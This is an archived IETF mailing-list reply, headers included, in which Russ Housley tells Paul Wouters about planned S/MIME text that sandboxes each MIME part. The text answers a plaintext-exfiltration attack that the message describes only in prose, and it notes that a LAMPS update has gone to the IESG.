IETF Logo Mail Archive

Re: More mail madness?

Russ Housley <housley@vigilsec.com> Mon, 14 May 2018 16:37 UTC

Return-Path: <housley@vigilsec.com>
X-Original-To: ietf@ietfa.amsl.com
Delivered-To: ietf@ietfa.amsl.com
Received: from localhost (localhost [127.0.0.1]) by ietfa.amsl.com (Postfix) with ESMTP id 69FA812DDD0 for <ietf@ietfa.amsl.com>; Mon, 14 May 2018 09:37:34 -0700 (PDT)
X-Virus-Scanned: amavisd-new at amsl.com
X-Spam-Flag: NO
X-Spam-Score: -1.899
X-Spam-Level:
X-Spam-Status: No, score=-1.899 tagged_above=-999 required=5 tests=[BAYES_00=-1.9, HTML_MESSAGE=0.001, RCVD_IN_DNSWL_NONE=-0.0001] autolearn=ham autolearn_force=no
Received: from mail.ietf.org ([4.31.198.44]) by localhost (ietfa.amsl.com [127.0.0.1]) (amavisd-new, port 10024) with ESMTP id diYzpbTEONxI for <ietf@ietfa.amsl.com>; Mon, 14 May 2018 09:37:32 -0700 (PDT)
Received: from mail.smeinc.net (mail.smeinc.net [209.135.209.11]) (using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by ietfa.amsl.com (Postfix) with ESMTPS id ABC9D126C22 for <ietf@ietf.org>; Mon, 14 May 2018 09:37:32 -0700 (PDT)
Received: from localhost (localhost [127.0.0.1]) by mail.smeinc.net (Postfix) with ESMTP id 79E11300ACA for <ietf@ietf.org>; Mon, 14 May 2018 12:37:30 -0400 (EDT)
X-Virus-Scanned: amavisd-new at mail.smeinc.net
Received: from mail.smeinc.net ([127.0.0.1]) by localhost (mail.smeinc.net [127.0.0.1]) (amavisd-new, port 10026) with ESMTP id gb8QYLZFckJK for <ietf@ietf.org>; Mon, 14 May 2018 12:37:27 -0400 (EDT)
Received: from new-host.home (pool-108-45-101-150.washdc.fios.verizon.net [108.45.101.150]) by mail.smeinc.net (Postfix) with ESMTPSA id AE17C300AC7; Mon, 14 May 2018 12:37:27 -0400 (EDT)
From: Russ Housley <housley@vigilsec.com>
Message-Id: <C8E07D79-DFC5-4DA5-981B-26AA91A04D09@vigilsec.com>
Content-Type: multipart/alternative; boundary="Apple-Mail=_CE3BEB20-BA89-44BD-A4FD-7BA157BE713F"
Mime-Version: 1.0 (Mac OS X Mail 10.3 \(3273\))
Subject: Re: More mail madness?
Date: Mon, 14 May 2018 12:37:28 -0400
In-Reply-To: <51B631EC-78B3-4FF4-A82C-725A029F3DB3@nohats.ca>
Cc: Phillip Hallam-Baker <phill@hallambaker.com>, IETF <ietf@ietf.org>, LAMPS <spasm@ietf.org>
To: Paul Wouters <paul@nohats.ca>
References: <CAMm+LwiOfdptL6u=SyCtQnz7xKrJD6HTDkKs+JGeHf54CSiv8A@mail.gmail.com> <B0CE44DF-DC7C-4411-B1CC-30B87E38D3F6@vigilsec.com> <51B631EC-78B3-4FF4-A82C-725A029F3DB3@nohats.ca>
X-Mailer: Apple Mail (2.3273)
Archived-At: <https://mailarchive.ietf.org/arch/msg/ietf/X1TOUY0uXjo29mUz0_dLRZvYWvM>
X-BeenThere: ietf@ietf.org
X-Mailman-Version: 2.1.22
Precedence: list
List-Id: IETF-Discussion <ietf.ietf.org>
List-Unsubscribe: <https://www.ietf.org/mailman/options/ietf>, <mailto:ietf-request@ietf.org?subject=unsubscribe>
List-Archive: <https://mailarchive.ietf.org/arch/browse/ietf/>
List-Post: <mailto:ietf@ietf.org>
List-Help: <mailto:ietf-request@ietf.org?subject=help>
List-Subscribe: <https://www.ietf.org/mailman/listinfo/ietf>, <mailto:ietf-request@ietf.org?subject=subscribe>
X-List-Received-Date: Mon, 14 May 2018 16:37:34 -0000

> On May 14, 2018, at 12:35 PM, Paul Wouters <paul@nohats.ca> wrote:
> 
>> On May 14, 2018, at 12:29, Russ Housley <housley@vigilsec.com> wrote:
>> 
>> We are working on text for S/MIME that says that each portion of a MIME multi-part needs to be handled in its own sandbox.  The direct exfiltration that is described happens because the mail user agent glues the various portions together for display to the user, which in the example on the web page causes an image to be fetched from the attacker's website with the message plaintext as part of the URL.
> 
> So that’s the bandaid. What and where will work be done on a solution?

LAMPS just sent an update to the S/MIME message document to the IESG.  My guess is that there will be discussion on the spasm@ietf.org <mailto:spasm@ietf.org> mail list.

Russ

v2.23.0 | Report a Bug | By Email